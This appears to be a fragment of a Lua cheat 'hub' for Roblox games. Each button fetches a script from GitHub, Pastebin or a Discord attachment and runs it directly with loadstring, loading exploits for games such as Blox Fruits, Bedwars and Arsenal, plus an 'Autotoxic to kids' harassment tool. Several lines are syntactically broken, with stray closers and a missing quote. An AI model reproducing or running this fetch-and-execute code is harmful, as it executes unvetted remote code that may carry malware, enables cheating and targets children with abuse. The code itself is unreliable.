Store = true  --------------------------------Auto Store after it got the fruit
Safeplace = true ----------------------------- Safeplace 
Repeat = true --------------------------------- Repeat continues hopping
-----------------------------------------------------------------------
loadstring(game:HttpGet"https://gist.githubusercontent.com/NotHubris/4e6fdc88d84c30afa9b28c590f273bbf/raw")()
print("Clicked")
end)
Section:NewButton("king legacy", "Loads king legacy script", function()
loadstring(game:HttpGet"https://raw.githubusercontent.com/xQuartyx/DonateMe/main/ScriptLoader")()
print("Clicked")
end)
Section:NewButton("vapev4 bedwars", "Use keyboard script then right shift to open gui", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/loadstring'))()
print("Clicked")
end)
Section:NewButton("Combat Warriors", "loads combat warriors script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ufouzzed/CWShitterHub/main/CWScript.lua"))()
print("Clicked")
end)
print("Clicked")
end)
Section:NewButton("Zamex hub", "More of bloxfruits", function()
loadstring(game:HttpGet('https://raw.githubusercontent.com/Sixnumz/ZamexMobile/main/Zamex_Mobile.lua'))()
print("Clicked")
end)
Section:NewButton("Uranium hub", "Loads another bloxfruit script", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/Augustzyzx/UraniumMobile/main/UraniumKak.lua"))()
print("Clicked")
end)
local Tab = Window:NewTab("Errrr")
Section:NewButton("Autotoxic", "Autotoxic to kids", function()
loadstring(game:HttpGet("https://cdn.discordapp.com/attachments/1016359889246879802/1042173963578658936/Protected.lua"))()
print("Clicked")
end)
Section:NewButton("Autoreport", "This is crazy", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/7GrandDadPGN/VapeV4ForRoblox/main/NewMainScript.lua", true))()
print("Clicked")
end)
local Section = Tab:NewSection("Just others..")
Section:NewButton("Race clicker I think", "Loads a script for raceclicker??", function()
loadstring(game:HttpGet(('https://raw.githubusercontent.com/Saaakai/Random-Roblox-Script/main/Race%20Clicker')))()
print("Clicked")
end)
Section:NewButton("Arsenal", "From jn hh", function()
loadstring(game:HttpGet("https://pastebin.com/raw/1WVsaA7C"))()
print("Clicked")
end)
Section:NewButton("All games script2", "This is better than my script", function()
loadstring(https://raw.githubusercontent.com/TakeModzz/Games-HUB-Destroyer-V3/main/Games%20HUB%20Destroyer%20V3"))()
print("Clicked")
end)
